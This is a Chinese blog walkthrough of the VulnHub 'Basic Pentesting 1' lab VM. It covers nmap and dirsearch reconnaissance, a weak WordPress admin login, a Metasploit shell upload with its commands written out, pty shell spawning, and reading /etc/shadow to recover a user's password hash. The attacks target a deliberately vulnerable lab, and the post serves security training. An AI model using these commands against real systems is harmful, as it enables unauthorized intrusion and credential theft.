【vulnhub】Basic Penetration靶机

最新推荐文章于 2024-09-09 21:36:49 发布
最新推荐文章于 2024-09-09 21:36:49 发布
阅读量268 收藏 2
点赞数 5
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140909842
版权

靶机安装

下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/#download

运行环境:Vmware

信息收集

靶机IP发现

nmap 192.168.93.0/24

端口扫描,开启了22,80,21端口

nmap -A 192.168.93.157 -p-

目录扫描

dirsearch -u http://192.168.93.157

网址访问

网址后面拼接目录扫到的/secret,发现是 wordpress 搭建的

扫描二级目录

dirsearch -u http://192.168.93.157/secret

访问 /wp-admin 页面,是一个登录页面

尝试弱口令,admin:admin 成功登录

获取shell

因为我们知道管理员账户与密码,所以利用msf的模块来getshell,启动msf,成功 getshell

msfconsole   #开启msf环境

search wp_admin 				#搜索wordpress的admin账户的上传利用脚本
use exploit/unix/webapp/wp_admin_shell_upload			#进入利用脚本
show option
set rhosts 192.168.93.157
set targeturi /secret/	#设置目标的url目录地址
set username admin   #设置登录的用户账号
set password admin   #设置登陆的用户密码
run

提权

先将获取到的shell转变为交互式的shell

shell

python -c 'import pty; pty.spawn("/bin/bash")'

进行sudo提权尝试,发现需要输入密码,不能用

文件/etc/shadow可读

发现/etc/shadow文件是可读的

ls -al /etc/shadow

在文件/etc/shadow里面进行查看密码,发现marlinspike用户的密码,进行解密

cat /etc/shadow


marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4
#解密过后
marlinspike:marlinspike

wbplife
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 224
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
Basic-penetration靶机
zdd1453691081的博客
08-04 147
(1)ip扫描
Vulnhub靶机 Basic penetration(渗透测试详解)
2301_78721909的博客
08-03 108
使用searchsploit工具搜索该版本的历史漏洞,发现存在命令执行漏洞。根据nmap的扫描结果发现ftp的版本为。2、对靶机IP进行主机发现和端口扫描。发现开放了21、22、80端口。成功获取root权限。
小白的靶机-VulnHub-IMF
wo41ge的博客
12-24 336
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 目标:得到root权限&找到四个flag.txt 开机界面就是个这 确定靶机地址:192.168.86.172 发现80端口 运行着Apache 直接上页面康康 这个选项 右键源代码发现flag1 flag1{YWxsdGhlZmlsZXM=} 发现这是一个base64的加密 进行解码 allthefiles 还有一个base64加密的标签 解码康康 这里有一个坑 他们三个 是连在一起的 只有
Torment-vulnhub靶机记录
m0_46580995的博客
08-11 284
开始经典的主机发现端口扫描 有21端口可以开心的匿名登录 成功登录并发现有ssh 和一个没见过的ngircd 跟进发现有一个密钥和一个channels get下来 首先尝试一下ngircd登录 apt-get install hexchat apt-get install ngircd 添加靶机地址(密码是后加的)但是没有密码因为用到的是ngircd尝试用其默认密码登录 cd /etc/ngircd cat ngircd.conf 在配置文件中找到默认密码wealllikedebian登录并
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 611
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
vulnhub靶机-DC7-Writeup
liuhanzhe的专栏
12-09 1568
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-7,356/ DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t exactly e
vulnhub靶机-DC8-Writeup
liuhanzhe的专栏
12-09 1993
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-8,367/ DESCRIPTION DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challe
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8454
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1413
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 369
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
零信任安全:重新思考数字世界的访问
网络研究观
09-09 642
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 417
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 811
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
Gartner发布安全威胁情报产品和服务市场指南:威胁情报产品和服务需具备的8项核心能力和21项可选能力
lurenjia404的博客
09-04 1302
安全和风险管理领导者很难知道哪些威胁会真正影响到他们的组织。他们应该利用这项研究来选择正确的安全威胁情报产品和服务,并更有效地了解和应对威胁形势。
亚信安全出席第五届国际反病毒大会 探究AI现代网络勒索治理
亚信安全官方账号的博客
09-09 347
亚信安全出席活动并发表题为《AI时代下现代网络勒索治理》的演讲
C++20标准对线程库的改进:更安全、更高效的并发编程
最新发布
jianglq的博客
09-09 623
C++20 是 C++ 语言的一个重要里程碑,它引入了许多新特性,其中就包括对线程库(thread)的重大改进。这些改进不仅增强了语言的并发编程能力,还解决了先前版本中的一些痛点问题。
入门黑客与渗透测试:实战指南
"The Basics of Hacking and Penetration Testing" 是一本英文原版的渗透测试实践指南,适合初学者入门,不适用于已有经验的专家。 本书深入浅出地介绍了黑客攻击和渗透测试的基础知识,旨在使读者理解并掌握道德...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值